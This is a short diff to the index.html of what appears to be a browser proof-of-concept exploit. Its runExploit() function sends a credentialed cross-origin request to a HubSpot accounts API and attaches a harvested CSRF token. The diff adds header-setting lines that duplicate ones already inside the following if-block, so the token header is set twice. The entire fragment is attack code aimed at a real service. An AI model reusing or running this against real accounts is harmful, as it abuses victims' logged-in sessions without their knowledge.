--- a/index.html
+++ b/index.html
@@ -43,8 +43,10 @@ function runExploit() {
   const xhr1 = new XMLHttpRequest();
   xhr1.open("GET", "https://app-eu1.hubspot.com/api/accounts/v1/basic-accounts/pinned", true);
   xhr1.withCredentials = true;
-  xhr1.setRequestHeader("Content-Type", "application/json");
   const token1 = getCsrfToken();
+  xhr1.setRequestHeader("Content-Type", "application/json");
+  xhr1.setRequestHeader("X-Hubspot-Csrf-Hubspotapi", token1);
+  console.log(token1)
   if (token1) {
     xhr1.setRequestHeader("X-Hubspot-Csrf-Hubspotapi", token1);
     console.log(token1)
